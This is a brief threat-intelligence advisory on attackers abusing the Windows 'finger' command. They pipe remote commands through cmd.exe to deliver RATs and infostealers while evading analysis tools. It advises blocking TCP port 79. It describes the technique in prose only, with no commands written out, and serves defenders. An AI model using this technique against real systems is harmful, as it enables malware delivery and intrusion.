The traditional “finger” command is being exploited by threat actors to deliver remote commands and malware on Windows devices. These attacks use the protocol to download Python malware, RATs, and evade detection, highlighting the need for traffic filtering. #ClickFix #NetSupportManagerRAT
Keypoints
- The finger command is increasingly being exploited in cyberattacks to execute malicious scripts on Windows systems.
- Threat actors use the protocol to retrieve and pipe remote commands through cmd.exe, leading to malware downloads.
- Recent campaigns involve delivering tools like RATs and infostealers disguised as PDF files via the finger command.
- Tools for malware analysis are checked first, but if absent, the attackers deploy remote access malware or RATs.
- Blocking TCP port 79 can help defenders prevent outbound connections to the finger protocol and mitigate these attacks.